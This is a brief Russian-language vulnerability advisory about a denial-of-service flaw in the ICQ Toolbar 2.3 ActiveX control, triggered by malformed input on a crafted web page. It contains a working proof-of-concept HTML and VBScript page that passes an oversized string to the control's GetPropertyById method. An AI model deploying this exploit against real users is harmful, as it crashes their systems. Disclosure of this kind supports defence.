Программа: ICQ Toolbar 2.3 ActiveX

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую
систему. Уязвимость существует из-за ошибки в проверке входных данных при
обработке HTTP страниц. Атакующий может обманным образом заманить пользователя
на специально составленный сайт, что приведет к отказу системы в обслуживании.

Пример:

<html>
<object classid='clsid:855F3B16-6D32-4FE6-8A56-BBB695989046' id='toolbar' ></object>

<script language='vbscript'>
bof=String(128, "spdr")
toolbar.GetPropertyById "" ,bof

</script>
</html>

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии